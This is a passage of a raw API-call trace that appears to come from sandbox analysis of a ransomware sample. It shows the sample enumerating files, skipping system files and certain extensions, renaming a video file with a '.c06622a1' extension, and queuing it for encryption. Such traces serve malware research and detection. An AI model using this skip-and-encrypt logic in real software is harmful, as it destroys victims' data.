lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe30c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe30c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.461] CloseHandle (hObject=0x678) returned 1 [0156.461] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq")) returned 0x10 [0156.461] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\") returned="" [0156.461] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\") returned 0x55 [0156.461] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe56c) returned 0x2db8800 [0156.461] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44d59730, ftCreationTime.dwHighDateTime=0x1d5e0a2, ftLastAccessTime.dwLowDateTime=0xdbdf44c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbdf44c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.462] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbdf44c0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbdf44c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbdf44c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.462] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.462] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21bbeea0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0xf8a4ed80, ftLastAccessTime.dwHighDateTime=0x1d5e4a6, ftLastWriteTime.dwLowDateTime=0xf8a4ed80, ftLastWriteTime.dwHighDateTime=0x1d5e4a6, nFileSizeHigh=0x0, nFileSizeLow=0xd81a, dwReserved0=0x0, dwReserved1=0x0, cFileName="XRF4L.mkv", cAlternateFileName="")) returned 1 [0156.462] _wcsicmp (_Str1="XRF4L.mkv", _Str2="README.c06622a1.TXT") returned 6 [0156.462] wcsstr (_Str="XRF4L.mkv", _SubStr="README") returned 0x0 [0156.462] _wcsicmp (_Str1="autorun.inf", _Str2="XRF4L.mkv") returned -23 [0156.462] wcslen (_String="autorun.inf") returned 0xb [0156.462] _wcsicmp (_Str1="boot.ini", _Str2="XRF4L.mkv") returned -22 [0156.462] wcslen (_String="boot.ini") returned 0x8 [0156.462] _wcsicmp (_Str1="bootfont.bin", _Str2="XRF4L.mkv") returned -22 [0156.462] wcslen (_String="bootfont.bin") returned 0xc [0156.463] _wcsicmp (_Str1="bootsect.bak", _Str2="XRF4L.mkv") returned -22 [0156.463] wcslen (_String="bootsect.bak") returned 0xc [0156.463] _wcsicmp (_Str1="desktop.ini", _Str2="XRF4L.mkv") returned -20 [0156.463] wcslen (_String="desktop.ini") returned 0xb [0156.463] _wcsicmp (_Str1="iconcache.db", _Str2="XRF4L.mkv") returned -15 [0156.463] wcslen (_String="iconcache.db") returned 0xc [0156.463] _wcsicmp (_Str1="ntldr", _Str2="XRF4L.mkv") returned -10 [0156.463] wcslen (_String="ntldr") returned 0x5 [0156.463] _wcsicmp (_Str1="ntuser.dat", _Str2="XRF4L.mkv") returned -10 [0156.463] wcslen (_String="ntuser.dat") returned 0xa [0156.463] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XRF4L.mkv") returned -10 [0156.463] wcslen (_String="ntuser.dat.log") returned 0xe [0156.463] _wcsicmp (_Str1="ntuser.ini", _Str2="XRF4L.mkv") returned -10 [0156.463] wcslen (_String="ntuser.ini") returned 0xa [0156.463] _wcsicmp (_Str1="thumbs.db", _Str2="XRF4L.mkv") returned -4 [0156.463] wcslen (_String="thumbs.db") returned 0x9 [0156.463] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.463] wcslen (_String="386") returned 0x3 [0156.463] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.463] wcslen (_String="adv") returned 0x3 [0156.463] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.463] wcslen (_String="ani") returned 0x3 [0156.463] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.463] wcslen (_String="bat") returned 0x3 [0156.463] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.463] wcslen (_String="bin") returned 0x3 [0156.463] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.463] wcslen (_String="cab") returned 0x3 [0156.463] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.463] wcslen (_String="cmd") returned 0x3 [0156.463] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.463] wcslen (_String="com") returned 0x3 [0156.463] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.463] wcslen (_String="cpl") returned 0x3 [0156.463] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.463] wcslen (_String="cur") returned 0x3 [0156.463] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.463] wcslen (_String="deskthemepack") returned 0xd [0156.464] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.464] wcslen (_String="diagcab") returned 0x7 [0156.464] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.464] wcslen (_String="diagcfg") returned 0x7 [0156.464] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.464] wcslen (_String="diagpkg") returned 0x7 [0156.464] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.464] wcslen (_String="dll") returned 0x3 [0156.464] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.464] wcslen (_String="drv") returned 0x3 [0156.464] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.464] wcslen (_String="exe") returned 0x3 [0156.464] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.464] wcslen (_String="hlp") returned 0x3 [0156.464] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.464] wcslen (_String="icl") returned 0x3 [0156.464] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.464] wcslen (_String="icns") returned 0x4 [0156.464] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.464] wcslen (_String="ico") returned 0x3 [0156.464] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.464] wcslen (_String="ics") returned 0x3 [0156.464] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.464] wcslen (_String="idx") returned 0x3 [0156.464] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.464] wcslen (_String="ldf") returned 0x3 [0156.464] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.464] wcslen (_String="lnk") returned 0x3 [0156.464] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.464] wcslen (_String="mod") returned 0x3 [0156.464] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.464] wcslen (_String="mpa") returned 0x3 [0156.464] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.464] wcslen (_String="msc") returned 0x3 [0156.464] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.464] wcslen (_String="msp") returned 0x3 [0156.464] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.464] wcslen (_String="msstyles") returned 0x8 [0156.465] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.465] wcslen (_String="msu") returned 0x3 [0156.465] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.465] wcslen (_String="nls") returned 0x3 [0156.465] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.465] wcslen (_String="nomedia") returned 0x7 [0156.465] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.465] wcslen (_String="ocx") returned 0x3 [0156.465] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.465] wcslen (_String="prf") returned 0x3 [0156.465] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.465] wcslen (_String="ps1") returned 0x3 [0156.465] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.465] wcslen (_String="rom") returned 0x3 [0156.465] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.465] wcslen (_String="rtp") returned 0x3 [0156.465] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.465] wcslen (_String="scr") returned 0x3 [0156.465] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.465] wcslen (_String="shs") returned 0x3 [0156.465] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.465] wcslen (_String="spl") returned 0x3 [0156.465] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.465] wcslen (_String="sys") returned 0x3 [0156.465] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.465] wcslen (_String="theme") returned 0x5 [0156.465] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.465] wcslen (_String="themepack") returned 0x9 [0156.465] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.465] wcslen (_String="wpx") returned 0x3 [0156.465] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.465] wcslen (_String="lock") returned 0x4 [0156.465] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.465] wcslen (_String="key") returned 0x3 [0156.465] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.465] wcslen (_String="hta") returned 0x3 [0156.465] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.465] wcslen (_String="msi") returned 0x3 [0156.465] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.466] wcslen (_String="pdb") returned 0x3 [0156.466] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.466] wcslen (_String="sql") returned 0x3 [0156.466] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.466] wcslen (_String="sqlite") returned 0x6 [0156.466] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq")) returned 0x10 [0156.466] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.466] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ" [0156.466] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ") returned 0x54 [0156.466] wcscpy (in: _Dest=0x456016a, _Source="XRF4L.mkv" | out: _Dest="XRF4L.mkv") returned="XRF4L.mkv" [0156.466] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv", dwFileAttributes=0x80) returned 1 [0156.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq\\xrf4l.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0156.466] SetFilePointerEx (in: hFile=0x668, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.467] ReadFile (in: hFile=0x668, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.468] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x6d847291 [0156.468] RtlComputeCrc32 (PartialCrc=0x7291, Buffer=0x3fe3f4, Length=0x80) returned 0xa888c77e [0156.468] RtlComputeCrc32 (PartialCrc=0xc77e, Buffer=0x3fe3f4, Length=0x80) returned 0xb9005265 [0156.468] RtlComputeCrc32 (PartialCrc=0x5265, Buffer=0x3fe3f4, Length=0x80) returned 0x34b00bdb [0156.468] RtlComputeCrc32 (PartialCrc=0xbdb, Buffer=0x3fe3f4, Length=0x80) returned 0x4e32c824 [0156.468] CloseHandle (hObject=0x668) returned 1 [0156.468] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.469] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv" [0156.469] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv") returned 0x5e [0156.469] wcscpy (in: _Dest=0x4570184, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.469] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq\\xrf4l.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq\\xrf4l.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\8Vvuv0bTqUZdX3oZQ\\XRF4L.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\8vvuv0btquzdx3ozq\\xrf4l.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x668 [0156.473] CreateIoCompletionPort (FileHandle=0x668, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.473] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2880020 [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x21914a19 [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x16ab3eeb [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2fe9b4c2 [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f29392a [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10917cff [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3055b030 [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa1559b4 [0156.479] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7be1cbf4 [0156.482] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2880094, Length=0x80) returned 0x50d33fa0 [0156.482] RtlComputeCrc32 (PartialCrc=0x3fa0, Buffer=0x2880094, Length=0x80) returned 0xf6fc288e [0156.482] RtlComputeCrc32 (PartialCrc=0x288e, Buffer=0x2880094, Length=0x80) returned 0x9ec84f40 [0156.482] RtlComputeCrc32 (PartialCrc=0x4f40, Buffer=0x2880094, Length=0x80) returned 0x333a584e [0156.482] RtlComputeCrc32 (PartialCrc=0x584e, Buffer=0x2880094, Length=0x80) returned 0xd440c1c7 [0156.482] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.482] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.482] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.482] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.482] FindClose (in: hFindFile=0x2db8800 | out: hFindFile=0x2db8800) returned 1 [0156.482] _wcsicmp (_Str1="backup", _Str2="8Vvuv0bTqUZdX3oZQ") returned 42 [0156.482] wcslen (_String="backup") returned 0x6 [0156.482] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.482] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.482] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c04b160, ftCreationTime.dwHighDateTime=0x1d5db6c, ftLastAccessTime.dwLowDateTime=0x97087b0, ftLastAccessTime.dwHighDateTime=0x1d5e41a, ftLastWriteTime.dwLowDateTime=0x97087b0, ftLastWriteTime.dwHighDateTime=0x1d5e41a, nFileSizeHigh=0x0, nFileSizeLow=0x17ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="cvDNeGwNwfaRnjiro6x.avi", cAlternateFileName="CVDNEG~1.AVI")) returned 1 [0156.482] _wcsicmp (_Str1="cvDNeGwNwfaRnjiro6x.avi", _Str2="README.c06622a1.TXT") returned -15 [0156.482] wcsstr (_Str="cvDNeGwNwfaRnjiro6x.avi", _SubStr="README") returned 0x0 [0156.482] _wcsicmp (_Str1="autorun.inf", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned -2 [0156.482] wcslen (_String="autorun.inf") returned 0xb [0156.482] _wcsicmp (_Str1="boot.ini", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned -1 [0156.483] wcslen (_String="boot.ini") returned 0x8 [0156.483] _wcsicmp (_Str1="bootfont.bin", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned -1 [0156.483] wcslen (_String="bootfont.bin") returned 0xc [0156.483] _wcsicmp (_Str1="bootsect.bak", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned -1 [0156.483] wcslen (_String="bootsect.bak") returned 0xc [0156.483] _wcsicmp (_Str1="desktop.ini", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned 1 [0156.483] wcslen (_String="desktop.ini") returned 0xb [0156.483] _wcsicmp (_Str1="iconcache.db", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned 6 [0156.483] wcslen (_String="iconcache.db") returned 0xc [0156.483] _wcsicmp (_Str1="ntldr", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned 11 [0156.483] wcslen (_String="ntldr") returned 0x5 [0156.483] _wcsicmp (_Str1="ntuser.dat", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned 11 [0156.483] wcslen (_String="ntuser.dat") returned 0xa [0156.483] _wcsicmp (_Str1="ntuser.dat.log", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned 11 [0156.483] wcslen (_String="ntuser.dat.log") returned 0xe [0156.483] _wcsicmp (_Str1="ntuser.ini", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned 11 [0156.483] wcslen (_String="ntuser.ini") returned 0xa [0156.483] _wcsicmp (_Str1="thumbs.db", _Str2="cvDNeGwNwfaRnjiro6x.avi") returned 17 [0156.483] wcslen (_String="thumbs.db") returned 0x9 [0156.483] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.483] wcslen (_String="386") returned 0x3 [0156.483] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.483] wcslen (_String="adv") returned 0x3 [0156.483] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.483] wcslen (_String="ani") returned 0x3 [0156.483] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.483] wcslen (_String="bat") returned 0x3 [0156.483] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.483] wcslen (_String="bin") returned 0x3 [0156.483] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.483] wcslen (_String="cab") returned 0x3 [0156.483] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.483] wcslen (_String="cmd") returned 0x3 [0156.483] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.483] wcslen (_String="com") returned 0x3 [0156.483] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.483] wcslen (_String="cpl") returned 0x3 [0156.483] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.484] wcslen (_String="cur") returned 0x3 [0156.484] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.484] wcslen (_String="deskthemepack") returned 0xd [0156.484] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.484] wcslen (_String="diagcab") returned 0x7 [0156.484] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.484] wcslen (_String="diagcfg") returned 0x7 [0156.484] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.484] wcslen (_String="diagpkg") returned 0x7 [0156.484] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.484] wcslen (_String="dll") returned 0x3 [0156.484] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.484] wcslen (_String="drv") returned 0x3 [0156.484] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.484] wcslen (_String="exe") returned 0x3 [0156.484] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.484] wcslen (_String="hlp") returned 0x3 [0156.484] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.484] wcslen (_String="icl") returned 0x3 [0156.484] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.484] wcslen (_String="icns") returned 0x4 [0156.484] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.484] wcslen (_String="ico") returned 0x3 [0156.484] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.484] wcslen (_String="ics") returned 0x3 [0156.484] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.484] wcslen (_String="idx") returned 0x3 [0156.484] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.484] wcslen (_String="ldf") returned 0x3 [0156.484] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.484] wcslen (_String="lnk") returned 0x3 [0156.484] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.484] wcslen (_String="mod") returned 0x3 [0156.484] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.484] wcslen (_String="mpa") returned 0x3 [0156.484] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.484] wcslen (_String="msc") returned 0x3 [0156.484] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.484] wcslen (_String="msp") returned 0x3 [0156.485] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.485] wcslen (_String="msstyles") returned 0x8 [0156.485] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.485] wcslen (_String="msu") returned 0x3 [0156.485] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.485] wcslen (_String="nls") returned 0x3 [0156.485] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.485] wcslen (_String="nomedia") returned 0x7 [0156.485] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.485] wcslen (_String="ocx") returned 0x3 [0156.485] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.485] wcslen (_String="prf") returned 0x3 [0156.485] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.485] wcslen (_String="ps1") returned 0x3 [0156.485] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.485] wcslen (_String="rom") returned 0x3 [0156.485] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.485] wcslen (_String="rtp") returned 0x3 [0156.485] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.485] wcslen (_String="scr") returned 0x3 [0156.485] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.485] wcslen (_String="shs") returned 0x3 [0156.485] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.485] wcslen (_String="spl") returned 0x3 [0156.485] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.485] wcslen (_String="sys") returned 0x3 [0156.485] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.485] wcslen (_String="theme") returned 0x5 [0156.485] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.485] wcslen (_String="themepack") returned 0x9 [0156.485] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.485] wcslen (_String="wpx") returned 0x3 [0156.485] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.485] wcslen (_String="lock") returned 0x4 [0156.485] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.485] wcslen (_String="key") returned 0x3 [0156.485] _wcsicmp (_Str1="hta", 